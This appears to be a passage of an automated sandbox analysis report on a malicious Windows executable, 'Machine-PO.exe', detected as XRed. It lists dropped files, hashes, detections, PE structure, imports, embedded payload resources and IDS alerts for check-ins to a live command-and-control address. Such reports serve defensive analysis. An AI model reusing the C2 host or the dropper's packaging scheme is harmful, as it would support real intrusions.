                                                                                                              SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                              MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                              SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                              SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                              SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\Documents\PIVFAGEAAV\SQSJKEBWDT.xlsm

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18387
                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                              Malicious:false
                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                              C:\Users\user\Documents\PIVFAGEAAV\~$SQSJKEBWDT.xlsx

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.5231029153786204
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:WH25nJFV:WH2/
                                                                                                              MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                              SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                              SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                              SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                              Malicious:false
                                                                                                              Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                              C:\Users\user\Documents\PIVFAGEAAV\~$cache1

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):771584
                                                                                                              Entropy (8bit):6.638013190381294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                              MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                              SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                              SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1835008
                                                                                                              Entropy (8bit):4.3723211049838655
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:qFVfpi6ceLP/9skLmb0gyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:CV1uyWWI/glMM6kF7qq
                                                                                                              MD5:BF6BAB80C6C5C569ABA3DC7073DB992F
                                                                                                              SHA1:6D6D5230A93D118805CC295CCDD21138E077BECD
                                                                                                              SHA-256:D4FC35EC6E1F64E21E940C4EDBC38517F614A1EA01382029A72823A5633EFB9D
                                                                                                              SHA-512:97EFAA8875D0E41549F77DB968D7887A56937B83C0D2A32002384E72030A12C7F2680B955C86C2E69BA3B926F28E56279D9AED7C7FEE25D4825BE703DBBB50FB
                                                                                                              Malicious:false
                                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...*.Z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.058935933771513
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 92.57%
                                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                                                                              • Windows ActiveX control (116523/4) 1.08%
                                                                                                              • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                              File name:Machine-PO.exe
                                                                                                              File size:2'208'256 bytes
                                                                                                              MD5:a6bd561711ea8c2064c20644cceee074
                                                                                                              SHA1:cb330a1ad78387bdc401142feecac763ac63d3d9
                                                                                                              SHA256:e6f8edcbe69419008b7e54f8554fc1aec66208de10c26a982d624ea91aed8092
                                                                                                              SHA512:62d55f02d14d122b10a0ef08dfa5ffa950f4153863246e3f6e6a6bd1a4d1c63321c7c4e9fb4306c0535e73389d764cc0646c0821a62fd50a2896ec49f205490b
                                                                                                              SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                              TLSH:3AA5CF62B3D58172C2735236AC3BA356AC3BBE191D34B54F3FE42E1DAE35341151A2A3
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                              File Icon

                                                                                                              Icon Hash:2eec8e8cb683b9b1

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x49ab80
                                                                                                              Entrypoint Section:CODE
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFF0h
                                                                                                              mov eax, 0049A778h
                                                                                                              call 00007F9B60D2119Dh
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007F9B60D74AE5h
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, 0049ABE0h
                                                                                                              call 00007F9B60D746E4h
                                                                                                              mov ecx, dword ptr [0049DBDCh]
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, dword ptr [00496590h]
                                                                                                              call 00007F9B60D74AD4h
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007F9B60D74B48h
                                                                                                              call 00007F9B60D1EC7Bh
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x170930.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xb00000x1709300x170a0020093491ea45130a81761c04a0081dceFalse0.642772841429298data7.161512057996996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                              RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                              RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                              RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                              RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                              RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                              RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                              RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                              RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                              RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                              RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                              RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                              RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                              RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                              RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                              RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                              RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                              RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                              RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.36350844277673544
                                                                                                              RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                              RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                              RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                              RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                              RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                              RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                              RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                              RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                              RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                              RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                              RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                              RT_STRING0xb67b80xdcdata0.6
                                                                                                              RT_STRING0xb68940x320data0.45125
                                                                                                              RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                              RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                              RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                              RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                              RT_STRING0xb74040x378data0.41103603603603606
                                                                                                              RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                              RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                              RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                              RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                              RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                              RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                              RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                              RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                              RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                              RT_RCDATA0xb8e040x10data1.5
                                                                                                              RT_RCDATA0xb8e140x15ec00PE32 executable (GUI) Intel 80386, for MS Windows0.539484977722168
                                                                                                              RT_RCDATA0x217a140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                              RT_RCDATA0x217a180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                              RT_RCDATA0x21b6180x64cdata0.5998759305210918
                                                                                                              RT_RCDATA0x21bc640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                              RT_RCDATA0x21bdb80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                              RT_GROUP_CURSOR0x22058c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                              RT_GROUP_CURSOR0x2205a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                              RT_GROUP_CURSOR0x2205b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x2205c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x2205dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x2205f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x2206040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_ICON0x2206180x14dataTurkishTurkey1.1
                                                                                                              RT_VERSION0x22062c0x304dataTurkishTurkey0.42875647668393785

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                              advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                              kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                              user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                              ole32.dllCLSIDFromString
                                                                                                              kernel32.dllSleep
                                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                              ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                              oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                              shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                              wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                              shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                              advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                              wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                              netapi32.dllNetbios

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              TurkishTurkey

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-30T11:25:08.484589+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849808172.111.138.1005552TCP
                                                                                                              2024-12-30T11:25:08.484589+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849962172.111.138.1005552TCP
                                                                                                              2024-12-30T11:25:08.484589+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849729172.111.138.1005552TCP
                                                                                                              2024-12-30T11:25:08.484589+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849802172.111.138.1005552TCP
